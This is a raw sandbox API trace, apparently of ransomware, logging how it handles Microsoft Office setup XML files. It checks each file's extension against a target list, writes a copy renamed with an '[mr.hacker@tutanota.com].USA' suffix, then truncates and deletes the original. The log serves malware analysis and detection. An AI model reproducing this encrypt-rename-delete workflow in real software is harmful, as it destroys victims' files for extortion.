[0041.419] lstrlenW (lpString=".7z") returned 3 [0041.419] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.419] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.419] lstrlenW (lpString=".dbf") returned 4 [0041.419] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.419] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.419] lstrlenW (lpString=".1cd") returned 4 [0041.419] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.419] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.419] lstrlenW (lpString=".jpg") returned 4 [0041.419] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.419] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.419] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.419] lstrlenW (lpString=".doc") returned 4 [0041.419] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.419] lstrlenW (lpString=".docx") returned 5 [0041.419] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.419] lstrlenW (lpString=".pdf") returned 4 [0041.419] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.420] lstrlenW (lpString=".xls") returned 4 [0041.420] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.420] lstrlenW (lpString=".xlsx") returned 5 [0041.420] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.420] lstrlenW (lpString=".ppt") returned 4 [0041.420] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.420] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.420] lstrlenW (lpString=".zip") returned 4 [0041.420] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.420] lstrlenW (lpString=".rar") returned 4 [0041.420] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.420] lstrlenW (lpString=".bz2") returned 4 [0041.420] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.420] lstrlenW (lpString=".7z") returned 3 [0041.420] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.420] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.420] lstrlenW (lpString=".dbf") returned 4 [0041.420] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.420] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.420] lstrlenW (lpString=".1cd") returned 4 [0041.420] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.420] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.420] lstrlenW (lpString=".jpg") returned 4 [0041.420] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.420] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0041.420] lstrlenW (lpString="VisiorWW.XML") returned 12 [0041.420] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.421] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=8723) returned 1 [0041.421] CloseHandle (hObject=0x1b8) returned 1 [0041.421] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml")) returned 0x20 [0041.421] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0041.421] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.421] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.421] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.421] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0041.456] GetLastError () returned 0x0 [0041.456] ReadFile (in: hFile=0x1b8, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x2213, lpOverlapped=0x0) returned 1 [0041.458] WriteFile (in: hFile=0x170, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x2220, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x2220, lpOverlapped=0x0) returned 1 [0041.459] ReadFile (in: hFile=0x1b8, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0041.459] WriteFile (in: hFile=0x170, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0041.459] SetEndOfFile (hFile=0x170) returned 1 [0041.459] CloseHandle (hObject=0x170) returned 1 [0041.460] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.460] SetEndOfFile (hFile=0x1b8) returned 1 [0041.460] CloseHandle (hObject=0x1b8) returned 1 [0041.461] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0041.461] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml")) returned 1 [0041.461] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.461] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.461] lstrlenW (lpString=".doc") returned 4 [0041.461] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.461] lstrlenW (lpString=".docx") returned 5 [0041.461] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0041.461] lstrlenW (lpString=".pdf") returned 4 [0041.461] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.461] lstrlenW (lpString=".xls") returned 4 [0041.461] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.461] lstrlenW (lpString=".xlsx") returned 5 [0041.461] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0041.461] lstrlenW (lpString=".ppt") returned 4 [0041.461] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.461] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.461] lstrlenW (lpString=".zip") returned 4 [0041.461] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.461] lstrlenW (lpString=".rar") returned 4 [0041.461] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.461] lstrlenW (lpString=".bz2") returned 4 [0041.461] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.461] lstrlenW (lpString=".7z") returned 3 [0041.462] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.462] lstrlenW (lpString=".dbf") returned 4 [0041.462] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.462] lstrlenW (lpString=".1cd") returned 4 [0041.462] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.462] lstrlenW (lpString=".jpg") returned 4 [0041.462] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.462] lstrlenW (lpString=".doc") returned 4 [0041.462] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.462] lstrlenW (lpString=".docx") returned 5 [0041.462] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0041.462] lstrlenW (lpString=".pdf") returned 4 [0041.462] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.462] lstrlenW (lpString=".xls") returned 4 [0041.462] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.462] lstrlenW (lpString=".xlsx") returned 5 [0041.462] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0041.462] lstrlenW (lpString=".ppt") returned 4 [0041.462] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.462] lstrlenW (lpString=".zip") returned 4 [0041.462] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.462] lstrlenW (lpString=".rar") returned 4 [0041.462] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.462] lstrlenW (lpString=".bz2") returned 4 [0041.462] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.462] lstrlenW (lpString=".7z") returned 3 [0041.462] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.463] lstrlenW (lpString=".dbf") returned 4 [0041.463] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.463] lstrlenW (lpString=".1cd") returned 4 [0041.463] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0041.463] lstrlenW (lpString=".jpg") returned 4 [0041.463] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.463] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0041.463] lstrlenW (lpString="SETUP.XML") returned 9 [0041.463] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.464] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=2424) returned 1 [0041.464] CloseHandle (hObject=0x1b8) returned 1 [0041.464] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml")) returned 0x20 [0041.465] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0041.465] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.465] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.465] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.465] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0041.465] GetLastError () returned 0x0 [0041.465] ReadFile (in: hFile=0x1b8, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x978, lpOverlapped=0x0) returned 1 [0041.467] WriteFile (in: hFile=0x170, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x980, lpOverlapped=0x0) returned 1 [0041.468] ReadFile (in: hFile=0x1b8, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0041.468] WriteFile (in: hFile=0x170, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.468] SetEndOfFile (hFile=0x170) returned 1 [0041.468] CloseHandle (hObject=0x170) returned 1 [0041.469] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.469] SetEndOfFile (hFile=0x1b8) returned 1 [0041.470] CloseHandle (hObject=0x1b8) returned 1 [0041.470] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0041.470] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml")) returned 1 [0041.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.470] lstrlenW (lpString=".doc") returned 4 [0041.470] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.470] lstrlenW (lpString=".docx") returned 5 [0041.470] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.470] lstrlenW (lpString=".pdf") returned 4 [0041.471] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.471] lstrlenW (lpString=".xls") returned 4 [0041.471] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.471] lstrlenW (lpString=".xlsx") returned 5 [0041.471] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.471] lstrlenW (lpString=".ppt") returned 4 [0041.471] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.471] lstrlenW (lpString=".zip") returned 4 [0041.471] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.471] lstrlenW (lpString=".rar") returned 4 [0041.471] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.471] lstrlenW (lpString=".bz2") returned 4 [0041.471] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.471] lstrlenW (lpString=".7z") returned 3 [0041.471] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.471] lstrlenW (lpString=".dbf") returned 4 [0041.471] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.471] lstrlenW (lpString=".1cd") returned 4 [0041.471] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.471] lstrlenW (lpString=".jpg") returned 4 [0041.471] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.471] lstrlenW (lpString=".doc") returned 4 [0041.471] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.471] lstrlenW (lpString=".docx") returned 5 [0041.471] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.471] lstrlenW (lpString=".pdf") returned 4 [0041.471] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.471] lstrlenW (lpString=".xls") returned 4 [0041.472] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.472] lstrlenW (lpString=".xlsx") returned 5 [0041.472] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.472] lstrlenW (lpString=".ppt") returned 4 [0041.472] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.472] lstrlenW (lpString=".zip") returned 4 [0041.472] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.472] lstrlenW (lpString=".rar") returned 4 [0041.472] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.472] lstrlenW (lpString=".bz2") returned 4 [0041.472] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.472] lstrlenW (lpString=".7z") returned 3 [0041.472] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.472] lstrlenW (lpString=".dbf") returned 4 [0041.472] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.472] lstrlenW (lpString=".1cd") returned 4 [0041.472] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.472] lstrlenW (lpString=".jpg") returned 4 [0041.472] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.472] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0041.472] lstrlenW (lpString="WordMUI.XML") returned 11 [0041.472] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.473] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1800) returned 1 [0041.473] CloseHandle (hObject=0x1b8) returned 1 [0041.473] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml")) returned 0x20 [0041.473] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0041.473] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.473] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.473] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.473] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0041.805] GetLastError () returned 0x0 [0041.805] ReadFile (in: hFile=0x1b8, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x708, lpOverlapped=0x0) returned 1 [0041.809] WriteFile (in: hFile=0x160, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x710, lpOverlapped=0x0) returned 1 [0041.810] ReadFile (in: hFile=0x1b8, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0041.810] WriteFile (in: hFile=0x160, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xea, lpOverlapped=0x0) returned 1 [0041.810] SetEndOfFile (hFile=0x160) returned 1 [0041.810] CloseHandle (hObject=0x160) returned 1 [0041.811] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.811] SetEndOfFile (hFile=0x1b8) returned 1 [0041.812] CloseHandle (hObject=0x1b8) returned 1 [0041.812] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0041.812] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml")) returned 1 [0041.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.812] lstrlenW (lpString=".doc") returned 4 [0041.812] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.812] 